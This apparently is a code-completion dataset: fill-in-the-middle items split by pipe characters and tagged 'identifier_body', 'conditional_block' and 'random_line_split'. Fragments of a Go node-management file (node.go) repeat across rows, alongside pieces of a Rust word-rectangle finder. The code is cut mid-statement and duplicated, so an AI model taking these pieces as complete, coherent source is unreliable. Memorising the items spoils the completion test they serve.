// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error | {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
} | identifier_body | |
node.go | R: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok |
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n | {
labels[k] = v
} | conditional_block |
node.go | CIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus | //worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, | type NodeStatus struct { | random_line_split |
main.rs | 1")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
| .arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn
filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make | let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
) | identifier_body |
main.rs | 11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!()) | .setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
